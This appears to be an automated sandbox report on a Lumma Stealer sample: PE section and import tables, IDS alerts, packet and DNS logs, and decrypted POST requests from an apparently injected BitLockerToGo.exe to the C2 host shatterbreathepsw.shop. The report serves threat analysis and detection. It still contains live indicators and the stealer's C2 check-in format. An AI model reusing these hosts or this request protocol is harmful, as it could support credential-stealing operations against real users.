                                                            .CRT0x9210000x700x20031fcf38d535a5764601d9a23884969e2False0.08203125data0.46748837148086453IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .tls0x9220000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x9230000x4f600x50004270861923e321a11fb038ba198532fcFalse0.47255859375data6.448265657019227IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .reloc0x9280000x153b00x15400add0325d735bd28deced8b7d6774eb7dFalse0.21808363970588235data5.432523906558254IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0x9231300x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.4964572508266415
                                                            RT_GROUP_ICON0x9273580x14data1.1
                                                            RT_VERSION0x92736c0x584dataEnglishUnited States0.24929178470254956
                                                            RT_MANIFEST0x9278f00x670XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.40230582524271846

                                                            Imports

                                                            DLLImport
                                                            KERNEL32.dllAddAtomA, AddVectoredContinueHandler, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreA, CreateThread, CreateWaitableTimerExW, DeleteAtom, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, FormatMessageA, FreeEnvironmentStringsW, GetAtomNameA, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetHandleInformation, GetLastError, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LoadLibraryW, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, RaiseFailFastException, ReleaseMutex, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetLastError, SetProcessAffinityMask, SetProcessPriorityBoost, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
                                                            msvcrt.dll___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _lock, _memccpy, _onexit, _setjmp, _strdup, _ultoa, _unlock, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, longjmp, malloc, memcpy, memmove, memset, printf, realloc, signal, strerror, strlen, strncmp, vfprintf, wcslen

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            05/02/24-17:04:31.224285TCP2052224ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI)49722443192.168.2.6104.21.95.19
                                                            05/02/24-17:04:21.147175TCP2052224ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI)49718443192.168.2.6104.21.95.19
                                                            05/02/24-17:04:21.035950UDP2052217ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (shatterbreathepsw .shop)5130853192.168.2.61.1.1.1
                                                            05/02/24-17:04:22.766689TCP2052224ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI)49719443192.168.2.6104.21.95.19
                                                            05/02/24-17:04:32.059166TCP2052224ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI)49723443192.168.2.6104.21.95.19
                                                            05/02/24-17:04:34.127001TCP2052224ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI)49726443192.168.2.6104.21.95.19
                                                            05/02/24-17:04:24.741485TCP2052224ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI)49720443192.168.2.6104.21.95.19
                                                            05/02/24-17:04:32.842406TCP2052224ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI)49724443192.168.2.6104.21.95.19
                                                            05/02/24-17:04:25.682174TCP2052224ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI)49721443192.168.2.6104.21.95.19

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            May 2, 2024 17:04:21.141778946 CEST49718443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:21.141818047 CEST44349718104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:21.141904116 CEST49718443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:21.147175074 CEST49718443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:21.147202969 CEST44349718104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:21.558207989 CEST44349718104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:21.558293104 CEST49718443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:21.562489986 CEST49718443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:21.562499046 CEST44349718104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:21.562834024 CEST44349718104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:21.610850096 CEST49718443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:21.673034906 CEST49718443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:21.673065901 CEST49718443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:21.673191071 CEST44349718104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:22.756299973 CEST44349718104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:22.756385088 CEST44349718104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:22.756452084 CEST49718443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:22.760368109 CEST49718443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:22.760382891 CEST44349718104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:22.766140938 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:22.766171932 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:22.766338110 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:22.766689062 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:22.766700983 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:22.957740068 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:22.957808018 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:22.959384918 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:22.959388971 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:22.959625006 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:22.961633921 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:22.961652040 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:22.961698055 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.474091053 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.474143028 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.474169970 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.474191904 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.474209070 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:23.474237919 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.474251032 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:23.474442959 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.474473000 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.474486113 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:23.474492073 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.474530935 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:23.474651098 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.474705935 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.474745989 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:23.474750996 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.474792004 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.474828959 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.474833012 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:23.474838018 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.474879980 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:23.474961996 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.475014925 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:23.475061893 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:24.561712980 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:24.561749935 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:24.561763048 CEST49719443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:24.561769962 CEST44349719104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:24.740978956 CEST49720443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:24.741014004 CEST44349720104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:24.741091013 CEST49720443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:24.741485119 CEST49720443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:24.741498947 CEST44349720104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:24.935204983 CEST44349720104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:24.935352087 CEST49720443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:24.936789989 CEST49720443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:24.936799049 CEST44349720104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:24.937041044 CEST44349720104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:24.938534975 CEST49720443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:24.938692093 CEST49720443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:24.938719988 CEST44349720104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:25.419720888 CEST44349720104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:25.419821978 CEST44349720104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:25.419877052 CEST49720443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:25.444894075 CEST49720443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:25.444916010 CEST44349720104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:25.681627989 CEST49721443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:25.681714058 CEST44349721104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:25.681799889 CEST49721443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:25.682173967 CEST49721443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:25.682200909 CEST44349721104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:26.296406031 CEST44349721104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:26.296516895 CEST49721443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:26.297916889 CEST49721443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:26.297941923 CEST44349721104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:26.298245907 CEST44349721104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:26.299654961 CEST49721443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:26.299863100 CEST49721443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:26.299901009 CEST44349721104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:26.299957991 CEST49721443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:26.299971104 CEST44349721104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:27.582772970 CEST44349721104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:27.582920074 CEST44349721104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:27.583009958 CEST49721443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:27.584614038 CEST49721443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:27.584654093 CEST44349721104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:31.223807096 CEST49722443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:31.223836899 CEST44349722104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:31.223906994 CEST49722443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:31.224284887 CEST49722443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:31.224299908 CEST44349722104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:31.413702965 CEST44349722104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:31.413820028 CEST49722443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:31.417568922 CEST49722443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:31.417574883 CEST44349722104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:31.417809010 CEST44349722104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:31.419255972 CEST49722443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:31.419549942 CEST49722443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:31.419579983 CEST44349722104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:31.419677019 CEST49722443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:31.419687033 CEST44349722104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:31.967907906 CEST44349722104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:31.968025923 CEST44349722104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:31.968090057 CEST49722443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:31.968394995 CEST49722443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:31.968406916 CEST44349722104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:32.058706999 CEST49723443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:32.058739901 CEST44349723104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:32.058819056 CEST49723443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:32.059165955 CEST49723443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:32.059180021 CEST44349723104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:32.251857996 CEST44349723104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:32.251959085 CEST49723443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:32.254769087 CEST49723443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:32.254775047 CEST44349723104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:32.255543947 CEST44349723104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:32.256735086 CEST49723443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:32.256918907 CEST49723443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:32.256944895 CEST44349723104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:32.755954027 CEST44349723104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:32.756072044 CEST44349723104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:32.756118059 CEST49723443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:32.756289959 CEST49723443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:32.756300926 CEST44349723104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:32.841825008 CEST49724443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:32.841878891 CEST44349724104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:32.841959000 CEST49724443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:32.842406034 CEST49724443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:32.842422962 CEST44349724104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:33.030770063 CEST44349724104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:33.030834913 CEST49724443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:33.032361031 CEST49724443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:33.032368898 CEST44349724104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:33.032598019 CEST44349724104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:33.034034014 CEST49724443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:33.034149885 CEST49724443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:33.034156084 CEST44349724104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:33.501748085 CEST44349724104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:33.501871109 CEST44349724104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:33.501940012 CEST49724443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:33.502104044 CEST49724443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:33.502126932 CEST44349724104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.126347065 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.126384974 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.126491070 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.127001047 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.127015114 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.765595913 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.765682936 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.767190933 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.767200947 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.767847061 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.769098043 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.769958019 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.769988060 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.770071983 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.770103931 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.770229101 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.770288944 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.770405054 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.770431995 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.770562887 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.770590067 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.770709038 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.770734072 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.770751953 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.770852089 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.770879030 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.816128969 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.816301107 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.816342115 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.816368103 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.860126019 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.860280991 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.860327005 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.860348940 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.908118963 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:34.908205986 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:34.952131033 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:35.701798916 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:38.847381115 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:38.847511053 CEST44349726104.21.95.19192.168.2.6
                                                            May 2, 2024 17:04:38.847583055 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:38.847727060 CEST49726443192.168.2.6104.21.95.19
                                                            May 2, 2024 17:04:38.847747087 CEST44349726104.21.95.19192.168.2.6

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            May 2, 2024 17:04:21.035949945 CEST5130853192.168.2.61.1.1.1
                                                            May 2, 2024 17:04:21.134630919 CEST53513081.1.1.1192.168.2.6

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            May 2, 2024 17:04:21.035949945 CEST192.168.2.61.1.1.10x7b2bStandard query (0)shatterbreathepsw.shopA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            May 2, 2024 17:04:21.134630919 CEST1.1.1.1192.168.2.60x7b2bNo error (0)shatterbreathepsw.shop104.21.95.19A (IP address)IN (0x0001)false
                                                            May 2, 2024 17:04:21.134630919 CEST1.1.1.1192.168.2.60x7b2bNo error (0)shatterbreathepsw.shop172.67.169.43A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • shatterbreathepsw.shop

                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.649718104.21.95.194437060C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 15:04:21 UTC269OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: shatterbreathepsw.shop
                                                            2024-05-02 15:04:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                            Data Ascii: act=life
                                                            2024-05-02 15:04:22 UTC806INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 15:04:22 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=dtfar21nn9shiefnjmdmm6ismp; expires=Mon, 26-Aug-2024 08:51:01 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yCNxCskk87i9Vhd74gsbmEQCnwBdDdMpxb1dx33KGQqEbHIB5XYclMwaWgqZM7ppmEadtq6Y95uFJL%2B%2FW1Sh%2FgzuxXJ9NobovWMMTnqohQ3wfcpkuxPneCslPKYSYQI15vQUGdPB%2B4GK"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d8e740cce864f0-GIG
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 15:04:22 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                            Data Ascii: 2ok
                                                            2024-05-02 15:04:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.649719104.21.95.194437060C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-02 15:04:22 UTC270OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 56
                                                            Host: shatterbreathepsw.shop
                                                            2024-05-02 15:04:22 UTC56OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 78 70 73 47 56 46 2d 2d 47 45 49 52 4f 50 41 26 6a 3d 64 65 66 61 75 6c 74
                                                            Data Ascii: act=recive_message&ver=4.0&lid=xpsGVF--GEIROPA&j=default
                                                            2024-05-02 15:04:23 UTC806INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 15:04:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=9pghrtbdj0hfmgc2l52cd9mkj2; expires=Mon, 26-Aug-2024 08:51:02 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JADYYFdES6CR27WWCHagA7Stn%2F5Gks4JT6ECguS8XjiQM4EKVcghtbwtKa%2BJ78bEgXU2NGEDUgiCyqeJMpxMEGZb6%2F7KxYKCk1aqBWr6vvsqnAsdrjSmi0rAWcjicrY8%2FEVDR5InCpW6"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d8e74898148c17-EWR
                                                            alt-svc: h3=":443"; ma=86400
